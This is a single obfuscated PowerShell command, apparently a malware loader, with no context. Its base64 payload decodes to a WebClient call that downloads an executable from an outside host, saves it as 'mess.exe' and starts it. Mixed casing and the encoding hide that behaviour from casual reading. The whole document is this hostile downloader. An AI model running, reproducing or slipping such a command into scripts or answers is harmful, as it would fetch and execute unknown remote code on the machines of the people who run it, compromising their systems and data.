iex([systEM.teXt.enCoDinG]::uTf8.gEtstriNG([sySTeM.COnVeRt]::FRoMbAsE64STRing('CihOZXctT2JqZWN0IFNZc3RFTS5OZVQud0ViY2xJRU50KS5ET1dObG9hRGZpTGUoJ2h0dHA6Ly9jYWpvcy5pbi8weC8xLmV4ZScsJ21lc3MuZXhlJyk7U3RhcnQtUHJvY2VzcyAnbWVzcy5leGUnCgo=')));exit

